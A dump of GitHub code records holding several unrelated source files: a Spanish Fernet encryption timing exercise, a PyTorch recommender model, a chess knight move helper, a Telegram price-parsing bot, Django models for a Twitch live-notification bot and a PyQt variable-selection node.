Cifrar e imprimir el texto cifrado.\n#Encriptar archivo\n\n# la funcion encriptar(nom_archivo,clave) toma el nombre del aarchivo y la clave de cifrado como argumentos\n\ndef encriptar(nom_archivo, clave):\n f = Fernet(clave) # se crea el objeto fernet con la clave proporcionada \n with open(nom_archivo, \"rb\") as file: # el archivo se abre en modo de lectura binaria rb y se lee el contenido \n\n # el contenido del archivo se cifra utilizando la clave y se guarda en la misma ubicacion del archivo original\n # se lee y se imprime el contenido del archivo cifrado de la consola\n archivo_info = file.read()\n encrypted_data = f.encrypt(archivo_info)\n with open(nom_archivo,\"wb\") as file:\n file.write(encrypted_data)\n with open(nom_archivo,'rb') as archivo_lectura:\n print(\"El archivo cifrado es: \")\n print(archivo_lectura.read())\n\nencriptar(nom_archivo, clave)\nfinE3 = time.time()\n \n\n\n#DESCENCRIPTAR\ninicioE4 = time.time()\n#Etapa 4: Descifrar e imprimir el texto claro.\n#Desencriptar archivo\n\n# la funcion desencriptar(nom_archivo, clave) toma el nombre del archivo y la clave de cifrado como argumentos \ndef desencriptar(nom_archivo, clave):\n f = Fernet(clave)\n with open(nom_archivo, \"rb\") as file:\n \n # el contenido del archivo se cifra utilizando la clave y se guarda en la misma ubicacion del archivo original\n # se lee y se imprime el contenido del archivo cifrado de la consola\n encrypted_data = file.read()\n desencrypted_data = f.decrypt(encrypted_data)\n with open(nom_archivo,\"wb\") as file:\n file.write(desencrypted_data)\n\n#desencriptar e imprimir\ndesencriptar(nom_archivo, clave)\nwith open(nom_archivo,'rt', encoding=\"utf-8\") as archivo_lectura2:\n print(\"El archivo descifrado es: \")\n print(archivo_lectura2.read())\nfinE4 = time.time()\n\n# finalmente se calcula el tiempo de ejecucion de cada etapa utilizando la funcion time.time() \n# los resultados se imprimen en la consola \n\nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E1: \")\nprint(finE1-inicioE1)\nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E2: \")\nprint(finE2-inicioE2)\nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E3: \")\nprint(finE3-inicioE3) \nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E4: \")\nprint(finE4-inicioE4)\nprint(\"-----------------------\")","repo_name":"23-23SGRTI/GRUPO02","sub_path":"Simetrico.py","file_name":"Simetrico.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"74295845563","text":"from torch import nn\nimport torch\nimport torch.functional as F\nfrom src.attentionSequencePoolingLayer import SequenceAttentionPoolingLayer\nfrom src.layers import FullyConnectedLayer\n\nclass DIN(nn.Module):\n def __init__(self,\n query_dim,\n hist_behavior_dim,\n user_profile_dim,\n hidden_dim_list = [512, 1],\n use_batchnorm=True,\n use_sigmoid = True,\n dropout=0):\n super(DIN, self).__init__()\n\n self.query_dim = query_dim\n self.hist_behavior_dim = hist_behavior_dim\n self.user_profile_dim = user_profile_dim\n self.hidden_dims = hidden_dim_list\n self.sequenceAttentionPoolingLayer= SequenceAttentionPoolingLayer(self.query_dim, self.hist_behavior_dim)\n self.no_hist_embedding = nn.Parameter(torch.randn((self.hist_behavior_dim, )))\n self.concated_dim = self.query_dim + self.hist_behavior_dim + self.user_profile_dim\n self.output_layer = FullyConnectedLayer(self.concated_dim,\n self.hidden_dims,\n sigmoid= use_sigmoid,\n batch_norm= use_batchnorm,\n dropout_rate= dropout)\n\n def forward(self, query_embedding, hist_embedding, hist_length, user_profile_embedding):\n\n # add wide part of model ?\n hist_pooled_embedding = self.sequenceAttentionPoolingLayer(query_embedding, hist_embedding, hist_length)\n # print('number of zero length history %d' %(torch.sum(hist_length == 0), ))\n hist_pooled_embedding = torch.where(hist_length == 0, hist_pooled_embedding, self.no_hist_embedding) # amazing shape broadcast\n embed_concated = torch.cat([query_embedding, hist_pooled_embedding, user_profile_embedding], dim= -1)\n\n\n logits = self.output_layer(embed_concated)\n\n return logits\n\n\nif __name__ == '__main__':\n query = torch.randn(3, 200)\n hist_behavior = torch.randn(3, 10, 100)\n hist_length = 8 * torch.ones(3, 1)\n user_profile_embedding = torch.randn(3, 300)\n\n t = DIN(200, 100, 300)\n out = t(query, hist_behavior, hist_length, user_profile_embedding)\n print(out.detach().numpy())","repo_name":"Yindong-Zhang/Zhiyuan-KanshanCup-expertDiscovery","sub_path":"ydzhang/src/DIN.py","file_name":"DIN.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"25854532545","text":"class Knight():\n possibleMoves = []\n moveSet = [\n [-1, -2],\n [-2, -1],\n [-2, +1],\n [-1, +2],\n [+1, -2],\n [+2, -1],\n [+2, +1],\n [+1, +2],\n ]\n def __init__(self, xPosition, yPosition):\n self.possibleMoves = [] # 1\n self.xPosition = xPosition # 1\n self.yPosition = yPosition # 1\n self.findPossibleMoves() # 8\n\n def findPossibleMoves(self):\n for move in self.moveSet: # 8\n newXPos = self.xPosition + move[0]\n newYPos = self.yPosition + move[1]\n if 0 <= newXPos <= 7 and 0 <= newYPos <= 7:\n self.possibleMoves.append([newXPos, newYPos])\n print(\"Possible moves for \" + str(self.xPosition) + \" , \" + str(self.yPosition) + \" : \"\n + str(self.possibleMoves))\n","repo_name":"haystacklab/KnightTravailsPy","sub_path":"app/model/Knight.py","file_name":"Knight.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"710066897","text":"import os\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nsetup(\n name='jira-comment-slack',\n version='0.2',\n url='https://github.com/smartxworks/jira-comment-slack',\n license='MIT',\n author='willharris/SmartXWorks/Kisung',\n description='Send JIRA comment updates to a Slack channel',\n long_description=__doc__,\n py_modules=[\"jira_comment_slack\"],\n zip_safe=False,\n include_package_data=True,\n platforms='any',\n install_requires=[\n 'Flask',\n 'requests',\n ],\n entry_points={\n 'console_scripts': [\n 'jira-comment-slack-server = jira_comment_slack:main',\n ],\n },\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","repo_name":"Kisung/jira-comment-slack","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"41"} +{"seq_id":"70453854844","text":"from telebot import TeleBot\nimport io\nfrom datetime import datetime\nimport openpyxl\n\nfrom database.database import DataBaseConnector\nfrom database.mydataclasses import Product\nfrom .parser import parse\nfrom .mydataclasses import \\\n ParseData, \\\n PriceLine, \\\n ErrorLine\n\nfrom .exceptions import ParseException\n\nfrom config import \\\n PRODUCTS_TABLE_NAME, \\\n PRICES_EXCEL_FILE_NAME, \\\n ERRORS_EXCEL_FILE_NAME, \\\n DATE_FORMAT_STRING\n\n\ndef get_excel(bot: TeleBot=None, message=None):\n connection = DataBaseConnector.get_connection()\n sql_request = (\n 'SELECT {}'.format(Product.select_values_string()) +\n 'FROM {}'.format(PRODUCTS_TABLE_NAME)\n )\n select_response = DataBaseConnector.select(\n connection=connection,\n sql_request=sql_request\n )\n\n prices_lines = []\n errors_lines = []\n\n def get_current_date():\n return datetime.today().strftime(DATE_FORMAT_STRING)\n\n if bot:\n edit_message_template = 'Прогресс: {current}\\\\' + str(len(select_response))\n text_to_send = edit_message_template.format(current=0)\n edit_message = bot.reply_to(message=message, text=text_to_send)\n\n line_counter = 0\n for line in select_response:\n product = Product.init_by_line(line)\n try:\n parse_data: ParseData = parse(product.url)\n price_line = PriceLine(\n barcode=product.barcode,\n sku=product.sku,\n competitor_name=parse_data.competitor_name,\n date=get_current_date(),\n default_price=parse_data.price_to_string(parse_data.default_price),\n promo_price=parse_data.price_to_string(parse_data.promo_price),\n url=product.url\n )\n prices_lines.append(price_line)\n except ParseException as ex:\n error_line = ErrorLine(\n barcode=product.barcode,\n sku=product.sku,\n date=get_current_date(),\n reason=ex.reason,\n url=ex.url\n )\n errors_lines.append(error_line)\n except Exception as ex:\n error_line = ErrorLine(\n barcode=product.barcode,\n sku=product.sku,\n date=get_current_date(),\n reason=str(ex),\n url=product.url\n )\n errors_lines.append(error_line)\n if bot:\n line_counter += 1\n text_to_send = edit_message_template.format(current=line_counter)\n bot.edit_message_text(\n chat_id=edit_message.chat.id,\n message_id=edit_message.message_id,\n text=text_to_send\n )\n\n prices_xlsx = openpyxl.Workbook()\n prices_sheet = prices_xlsx.active\n prices_sheet.append(PriceLine.get_excel_data_header())\n for line in prices_lines:\n prices_sheet.append(line.to_excel_line())\n\n errors_xlsx = openpyxl.Workbook()\n errors_sheet = errors_xlsx.active\n errors_sheet.append(ErrorLine.get_excel_data_header())\n for line in errors_lines:\n errors_sheet.append(line.to_excel_line())\n\n return prices_xlsx, errors_xlsx\n\n\ndef parse_endpoint_impl(bot: TeleBot, message):\n bot_message = bot.reply_to(message, 'Начало парсинга, ждите...')\n\n try:\n prices_xlsx, errors_xlsx = get_excel(bot=bot, message=bot_message)\n\n prices_xlsx_bytes_io = io.BytesIO()\n errors_xlsx_bytes_io = io.BytesIO()\n\n prices_xlsx.save(prices_xlsx_bytes_io)\n errors_xlsx.save(errors_xlsx_bytes_io)\n\n bot_message = bot.send_document(\n chat_id=message.chat.id,\n document=prices_xlsx_bytes_io.getbuffer(),\n caption='Актуальная таблица с ценами',\n visible_file_name=PRICES_EXCEL_FILE_NAME,\n reply_to_message_id=message.id\n )\n bot.send_document(\n chat_id=message.chat.id,\n document=errors_xlsx_bytes_io.getbuffer(),\n caption='Возникшие в ходе получения актуальных цен ошибки',\n visible_file_name=ERRORS_EXCEL_FILE_NAME,\n reply_to_message_id=bot_message.id\n )\n prices_xlsx.close()\n errors_xlsx.close()\n prices_xlsx_bytes_io.close()\n errors_xlsx_bytes_io.close()\n\n except Exception as ex:\n bot.reply_to(message=message, text=str(ex))\n return\n","repo_name":"yabifurkator/price-tracker-bot","sub_path":"endpoints/parse/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"9840701534","text":"import random\nimport string\nfrom django.db import models\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\nfrom cogs.utils import logify_exception_info\n\n\nclass BearerToken(models.Model):\n timestamp = models.DateTimeField(default=timezone.now, verbose_name='Timestamp')\n expired = models.BooleanField(default=False, verbose_name='Expired')\n access_token = models.CharField(max_length=255, verbose_name='Access Token')\n expires_in = models.BigIntegerField(verbose_name='Expires In (seconds)')\n refresh_token = models.CharField(max_length=255, verbose_name='Refresh Token')\n \n def __str__(self):\n return '{}'.format(self.access_token)\n \n class Meta:\n verbose_name = 'Bearer Token'\n verbose_name_plural = 'Bearer Tokens'\n ordering = ['-timestamp', 'expired']\n\n\nclass TwitchGame(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Game ID')\n name = models.TextField(max_length=255, blank=True, verbose_name='Game Name', default='')\n box_art = models.URLField(blank=True, null=True, verbose_name=\"Game Box Art\")\n\n def __str__(self):\n return self.name\n \n class Meta:\n verbose_name = \"Twitch Game\"\n verbose_name_plural = \"Twitch Games\"\n\n\nclass TwitchChannel(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Channel ID')\n name = models.CharField(max_length=255, verbose_name='Channel Name')\n display_name = models.CharField(max_length=255, blank=True, null=True, verbose_name='Channel Display Name')\n profile_image = models.URLField(blank=True, null=True, verbose_name=\"Profile Image URL\")\n offline_image = models.URLField(blank=True, null=True, verbose_name=\"Offline Image URL\")\n\n def __str__(self):\n if self.display_name is None or self.display_name == \"\":\n return str(self.name)\n else:\n return str(self.display_name)\n\n @property\n def url(self):\n return 'https://twitch.tv/{}'.format(self.name)\n\n class Meta:\n verbose_name = 'Twitch Channel'\n verbose_name_plural = 'Twitch Channels'\n ordering = ['name']\n\n\nclass DiscordGuild(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Guild ID')\n name = models.CharField(max_length=255, verbose_name='Guild Name')\n\n def __str__(self):\n return '{}'.format(self.name)\n\n class Meta:\n verbose_name = 'Discord Guild'\n verbose_name_plural = 'Discord Guilds'\n ordering = ['name']\n\n\nclass DiscordChannel(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Channel ID')\n name = models.CharField(max_length=255, verbose_name='Channel Name')\n guild = models.ForeignKey(DiscordGuild, verbose_name='Channel Guild', on_delete=models.CASCADE)\n\n def __str__(self):\n return '{}'.format(self.name)\n\n @classmethod\n def get_content_type(cls):\n return ContentType.objects.get_for_model(cls)\n\n class Meta:\n verbose_name = 'Discord Channel'\n verbose_name_plural = 'Discord Channels'\n ordering = ['guild__name', 'name']\n\n\nclass Twitter(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Twitter ID')\n name = models.CharField(max_length=255, verbose_name='Username')\n\n def __str__(self):\n return '{}'.format(self.name)\n\n @classmethod\n def get_content_type(cls):\n return ContentType.objects.get_for_model(cls)\n\n class Meta:\n verbose_name = 'Twitter Account'\n verbose_name_plural = 'Twitter Accounts'\n ordering = ['name']\n\n\nclass TwitchNotification(models.Model):\n \"\"\"\n content_type = Model Type\n object_id = PK for content_type\n content_object = Reference to actual model with content\n\n Examples:\n - TwitchNotification.objects.create(twitch=TwitchChannel, content_object=DiscordMessage)\n - TwitchNotification.objects.create(twitch=TwitchChannel, content_object=Tweet)\n - TwitchNotification.objects.filter(twitch=TwitchChannel, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n - TwitchNotification.objects.get(twitch=TwitchChannel, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n\n This is meant to be used to store related information sent for\n Twitter, Discord or anything added in the future.\n\n This is where users will store what DiscordChannel or Twitter or\n anything else they want notified when they go live\n \"\"\"\n twitch = models.ForeignKey(TwitchChannel, verbose_name='Twitch Channel', on_delete=models.CASCADE)\n limit = models.Q(app_label = 'livebot')\n content_type = models.ForeignKey(ContentType, limit_choices_to=limit, on_delete=models.CASCADE)\n object_id = models.BigIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n message = models.CharField(max_length=255, verbose_name='Notification Message')\n delay_minutes = models.IntegerField(default=60, verbose_name='Delay Minutes')\n\n def __str__(self):\n return '{}'.format(self.twitch)\n\n def save(self, *args, **kwargs):\n # if self.message == \"\" or self.message is None:\n # if self.content_type == DiscordChannel.get_content_type():\n # self.message = \"{name} is live and is playing {game}! {url}\"\n # elif self.content_type == Twitter.get_content_type():\n # self.message = \"I'm live and playing {game}! {url}\"\n # else:\n # self.message = \"{name} is live! {url}\"\n super().save(*args, **kwargs)\n\n def get_message(self, *args, **kwargs):\n # Used to determine type of post to be made and to post about it\n message_dict = {\n 'url': self.twitch.url,\n }\n message = self.message.format(**message_dict, **kwargs)\n return message\n\n class Meta:\n verbose_name = 'Twitch Notification'\n verbose_name_plural = 'Twitch Notifications'\n\n\nclass TwitchLive(models.Model):\n twitch = models.ForeignKey(TwitchChannel, verbose_name='Twitch Channel', on_delete=models.CASCADE)\n timestamp = models.DateTimeField()\n game = models.ForeignKey(TwitchGame, verbose_name='Twitch Game', blank=True, null=True, on_delete=models.SET_NULL)\n\n def __str__(self):\n return '{}'.format(self.twitch)\n\n class Meta:\n verbose_name = 'Twitch Live'\n verbose_name_plural = 'Twitch Live Instances'\n ordering = ['-timestamp', 'twitch__name']\n\n\nclass Notification(models.Model):\n \"\"\"\n content_type = Model Type\n object_id = PK for content_type\n content_object = Reference to actual model with content\n\n Examples:\n - Notification.objects.create(live=TwitchLive, content_object=DiscordMessage)\n - Notification.objects.create(live=TwitchLive, content_object=Tweet)\n - Notification.objects.filter(live=TwitchLive, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n - Notification.objects.get(live=TwitchLive, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n\n This is meant to be the area to store notification results (whether success or not) when they go live\n \"\"\"\n log = models.ForeignKey('Log', verbose_name='Log Item', on_delete=models.CASCADE)\n live = models.ForeignKey(TwitchLive, verbose_name='Twitch Live', on_delete=models.CASCADE)\n limit = models.Q(app_label = 'livebot')\n content_type = models.ForeignKey(ContentType, limit_choices_to=limit, on_delete=models.CASCADE)\n object_id = models.BigIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n success = models.BooleanField(default=False, verbose_name='Success')\n\n def __str__(self):\n return '{}'.format(self.live)\n\n class Meta:\n verbose_name = 'Notification'\n verbose_name_plural = 'Notifications'\n ordering = ['-live__timestamp']\n\n\nclass Log(models.Model):\n timestamp = models.DateTimeField(default=timezone.now)\n message_token = models.CharField(blank=True, null=True, max_length=50)\n message = models.TextField(default=\"\")\n email = models.BooleanField(default=False)\n subject = models.CharField(max_length=4000, blank=True, null=True, default=None)\n body = models.CharField(max_length=4000, blank=True, null=True, default=None)\n\n def __str__(self):\n return \"[{}] - {}\".format(self.timestamp, self.message_token)\n\n def save(self, *args, **kwargs):\n self.generate_log_token(save=False)\n super().save(*args, **kwargs)\n\n @property\n def short_message(self):\n from django.template.defaultfilters import truncatechars\n return truncatechars(self.message, 100)\n\n def generate_log_token(self, save=True):\n try:\n if self.message_token is None or self.message_token == '':\n self.message_token = self.generate_token()\n if save:\n self.save()\n return True\n except Exception as e:\n print(e)\n self.__class__.objects.create(message=\"{}\\nError generating log token.\\n\\nException:\\n{}\".format(logify_exception_info(), e), message_token=\"ERROR_GENERATING_LOG_TOKEN\")\n return False\n\n def random_key(self, length=50):\n key = ''\n for i in range(length):\n key += random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)\n return key\n\n def generate_token(self):\n token_key = random_key()\n if self.__class__.objects.filter(message_token=token_key).count() >= 1:\n token_key = self.generate_token()\n return token_key\n\n class Meta:\n verbose_name = 'Log'\n verbose_name_plural = 'Logs'\n ordering = ['-timestamp']\n\n\ndef random_key(length=50):\n key = ''\n for i in range(length):\n key += random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)\n return key\n\nimport livebot.signals\n","repo_name":"bsquidwrd/Live-Bot","sub_path":"livebot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"7958513914","text":"from copy import deepcopy\nimport datetime\nfrom PyQt5.QtCore import (QDir, Qt)\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import (QButtonGroup, QComboBox, QDialog, QFileDialog, QGroupBox,\n QHBoxLayout, QLabel, QLineEdit, QMessageBox, QPushButton, QRadioButton,\n QSpacerItem, QTableWidgetItem, QVBoxLayout, QWidget)\n\nfrom pyteltools.geom.transformation import load_transformation_map\nfrom pyteltools.gui.util import DoubleSliderBox, FrictionLawMessage, SettlingVelocityMessage, SimpleTimeDateSelection,\\\n TimeRangeSlider, VariableTable\nimport pyteltools.slf.misc as operations\nfrom pyteltools.slf.Serafin import SLF_EIT\nfrom pyteltools.slf.variables import get_available_variables, get_necessary_equations, get_US_equation, \\\n new_variables_from_US\n\nfrom .Node import Node, OneInOneOutNode, TwoInOneOutNode\n\n\nclass SelectVariablesNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nVariables'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n self.in_data = None\n self.data = None\n self.selected_vars = []\n self.selected_vars_names = {}\n self.new_options = tuple()\n self.friction_law = -1\n self.us_equation = None\n self.us_button = None\n self.ws_button = None\n self.first_table = None\n self.second_table = None\n\n self.YELLOW = QColor(245, 255, 207)\n self.GREEN = QColor(200, 255, 180)\n\n def get_option_panel(self):\n option_panel = QWidget()\n self.first_table = VariableTable()\n self.second_table = VariableTable()\n for var_id, (var_name, var_unit) in self.in_data.selected_vars_names.items():\n if var_id in self.selected_vars_names:\n row = self.second_table.rowCount()\n self.second_table.insertRow(row)\n id_item = QTableWidgetItem(var_id.strip())\n name_item = QTableWidgetItem(var_name.decode(SLF_EIT).strip())\n unit_item = QTableWidgetItem(var_unit.decode(SLF_EIT).strip())\n for j, item in enumerate([id_item, name_item, unit_item]):\n if not self.in_data.header.is_2d and var_id == 'Z':\n item.setFlags(Qt.NoItemFlags)\n self.second_table.setItem(row, j, item)\n else:\n row = self.first_table.rowCount()\n self.first_table.insertRow(row)\n id_item = QTableWidgetItem(var_id.strip())\n name_item = QTableWidgetItem(var_name.decode(SLF_EIT).strip())\n unit_item = QTableWidgetItem(var_unit.decode(SLF_EIT).strip())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n\n hlayout = QHBoxLayout()\n vlayout = QVBoxLayout()\n vlayout.setAlignment(Qt.AlignHCenter)\n lb = QLabel('Available variables')\n vlayout.addWidget(lb)\n vlayout.setAlignment(lb, Qt.AlignHCenter)\n vlayout.addWidget(self.first_table)\n\n computable_vars = get_available_variables(self.in_data.selected_vars, is_2d=self.in_data.header.is_2d)\n\n for var in computable_vars:\n if var.ID() not in self.selected_vars:\n row = self.first_table.rowCount()\n self.first_table.insertRow(self.first_table.rowCount())\n id_item = QTableWidgetItem(var.ID())\n name_item = QTableWidgetItem(var.name(self.in_data.language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n self.first_table.item(row, j).setBackground(self.YELLOW) # set new variables colors to yellow\n else:\n row = self.second_table.rowCount()\n self.second_table.insertRow(self.second_table.rowCount())\n id_item = QTableWidgetItem(var.ID())\n name_item = QTableWidgetItem(var.name(self.in_data.language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.second_table.setItem(row, j, item)\n self.second_table.item(row, j).setBackground(self.YELLOW) # set new variables colors to yellow\n\n if self.in_data.header.is_2d:\n self.us_button = QPushButton('Add US from friction law')\n self.us_button.setToolTip('Compute US based on a friction law')\n self.us_button.setEnabled(False)\n self.us_button.setFixedWidth(200)\n\n if 'US' not in self.in_data.selected_vars and 'W' in self.in_data.selected_vars and self.us_equation is None:\n available_var_IDs = list(map(lambda x: x.ID(), computable_vars))\n available_var_IDs.extend(self.in_data.selected_vars)\n if 'H' in available_var_IDs and 'M' in available_var_IDs:\n self.us_button.setEnabled(True)\n\n if 'US' not in self.in_data.selected_vars and self.us_equation is not None:\n new_vars = new_variables_from_US(self.in_data.selected_vars)\n for var in new_vars:\n if var.ID() not in self.selected_vars:\n row = self.first_table.rowCount()\n self.first_table.insertRow(row)\n id_item = QTableWidgetItem(var.ID().strip())\n name_item = QTableWidgetItem(var.name(self.scene().language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n self.first_table.item(row, j).setBackground(self.GREEN)\n else:\n row = self.second_table.rowCount()\n self.second_table.insertRow(row)\n id_item = QTableWidgetItem(var.ID().strip())\n name_item = QTableWidgetItem(var.name(self.scene().language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.second_table.setItem(row, j, item)\n self.second_table.item(row, j).setBackground(self.GREEN)\n\n self.us_button.clicked.connect(self._add_us)\n\n vlayout.addItem(QSpacerItem(1, 5))\n hlayout2 = QHBoxLayout()\n hlayout2.addItem(QSpacerItem(30, 1))\n hlayout2.addWidget(self.us_button)\n hlayout2.addItem(QSpacerItem(30, 1))\n vlayout.addLayout(hlayout2)\n vlayout.addItem(QSpacerItem(1, 5))\n\n vlayout.setAlignment(Qt.AlignLeft)\n hlayout.addLayout(vlayout)\n hlayout.addItem(QSpacerItem(15, 1))\n vlayout = QVBoxLayout()\n lb = QLabel('Output variables')\n vlayout.addWidget(lb)\n vlayout.setAlignment(lb, Qt.AlignHCenter)\n vlayout.addWidget(self.second_table)\n hlayout.addLayout(vlayout)\n option_panel.setLayout(hlayout)\n\n option_panel.destroyed.connect(self._select)\n\n return option_panel\n\n def _select(self):\n selected_vars = []\n selected_vars_names = {}\n for i in range(self.second_table.rowCount()):\n var_id, var_name, var_unit = [self.second_table.item(i, j).text() for j in range(3)]\n selected_vars.append(var_id)\n selected_vars_names[var_id] = (bytes(var_name, SLF_EIT).ljust(16),\n bytes(var_unit, SLF_EIT).ljust(16))\n self.new_options = (selected_vars, selected_vars_names)\n\n def _add_us(self):\n msg = FrictionLawMessage()\n value = msg.exec_()\n if value != QDialog.Accepted:\n return\n\n self.friction_law = msg.getChoice()\n self.us_equation = get_US_equation(self.friction_law)\n new_vars = new_variables_from_US([var for var in self.in_data.header.var_IDs\n if var in self.in_data.selected_vars])\n for var in new_vars:\n row = self.first_table.rowCount()\n self.first_table.insertRow(row)\n id_item = QTableWidgetItem(var.ID().strip())\n name_item = QTableWidgetItem(var.name(self.scene().language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n self.first_table.item(row, j).setBackground(self.GREEN) # set new US color to green\n\n self.us_button.setEnabled(False)\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if self.selected_vars:\n known_vars = [var for var in self.in_data.header.var_IDs if var in self.in_data.selected_vars]\n new_vars = known_vars[:]\n new_vars.extend(list(map(lambda x: x.ID(), get_available_variables(new_vars,\n is_2d=self.in_data.header.is_2d))))\n if self.in_data.header.is_2d and self.us_equation is not None:\n if 'US' not in self.in_data.selected_vars and 'W' in self.in_data.selected_vars:\n us_vars = new_variables_from_US(known_vars)\n new_vars.extend([x.ID() for x in us_vars])\n intersection = [var for var in self.selected_vars if var in new_vars]\n\n if intersection:\n self.selected_vars = intersection\n self.selected_vars_names = {var_id: self.selected_vars_names[var_id]\n for var_id in intersection}\n if not self.in_data.header.is_2d and 'Z' not in intersection and 'Z' in self.in_data.header.var_IDs:\n self.selected_vars = ['Z'] + intersection\n self.selected_vars_names['Z'] = self.in_data.selected_vars_names['Z']\n if not self.in_data.header.is_2d:\n self.us_equation = None\n else:\n if 'US' in self.in_data.selected_vars or 'W' not in self.in_data.selected_vars:\n self.us_equation = None\n elif 'H' not in known_vars or 'M' not in known_vars:\n self.us_equation = None\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n return\n else:\n self.selected_vars = self.in_data.selected_vars[:]\n self.selected_vars_names = deepcopy(self.in_data.selected_vars_names)\n self.us_equation = None\n else:\n self.selected_vars = self.in_data.selected_vars[:]\n self.selected_vars_names = deepcopy(self.in_data.selected_vars_names)\n self.us_equation = None\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.selected_vars and self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = self.in_port.mother.parentItem().data\n if self.state != Node.SUCCESS:\n self._reset()\n\n if super().configure():\n self.selected_vars, self.selected_vars_names = self.new_options\n if not self.selected_vars:\n self.state = Node.NOT_CONFIGURED\n else:\n self.reconfigure_downward()\n self.update()\n\n def save(self):\n vars = ','.join(self.selected_vars)\n names, units = [], []\n for var in self.selected_vars:\n name, unit = self.selected_vars_names[var]\n names.append(name.decode(SLF_EIT).strip())\n units.append(unit.decode(SLF_EIT).strip())\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str(self.friction_law),\n vars, ','.join(names), ','.join(units)])\n\n def load(self, options):\n friction_law, vars, names, units = options\n self.friction_law = int(friction_law)\n if self.friction_law > -1:\n self.us_equation = get_US_equation(self.friction_law)\n if vars:\n for var, name, unit in zip(vars.split(','), names.split(','), units.split(',')):\n self.selected_vars.append(var)\n self.selected_vars_names[var] = (bytes(name, SLF_EIT).ljust(16), bytes(unit, SLF_EIT).ljust(16))\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.us_equation = self.us_equation\n self.data.equations = get_necessary_equations(self.in_data.header.var_IDs, self.selected_vars,\n is_2d=self.data.header.is_2d, us_equation=self.us_equation)\n self.data.selected_vars = self.selected_vars\n self.data.selected_vars_names = {}\n for var_ID, (var_name, var_unit) in self.selected_vars_names.items():\n self.data.selected_vars_names[var_ID] = (var_name, var_unit)\n 